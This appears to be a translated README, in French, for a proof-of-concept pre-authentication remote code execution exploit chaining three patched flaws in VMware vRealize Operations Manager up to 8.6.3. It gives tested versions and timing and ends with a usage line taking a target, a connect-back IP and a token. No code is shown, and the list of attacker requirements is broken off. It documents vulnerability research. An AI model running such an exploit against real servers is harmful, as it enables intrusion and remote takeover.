
Il s'agit d'un exploit RCE pré-authentifié pour VMware vRealize Operations Manager.
Il s'agit d'un exploit RCE pré-authentifié pour VMware vRealize Operations Manager (vROPS) qui affecte les versions <= 8.6.3.19682901.
Steven Seeley de l'Institut de recherche sur les vulnérabilités de Qihoo 360
L'exploit a été testé contre la version 8.6.3.19682901 en utilisant le fichier vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) mais il est connu pour fonctionner également avec d'autres versions plus anciennes.
Cet exploit enchaîne trois vulnérabilités qui ont été corrigées. De plus amples détails sont disponibles dans le billet de blog:
Cet exploit nécessitera que l'attaquant fournisse :
APUAT-8.5.0.18176777.pak.Il y a beaucoup de composants en jeu dans cet exploit, j'espère que je l'ai bien conçu pour qu'il fonctionne du premier coup.
L'exploit prend en moyenne ~1m34.142s pour aboutir (testé 5 fois), j'ai essayé de le concevoir pour que ce soit plus rapide, mais cela reste dans le temps alloué pour une compétition ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
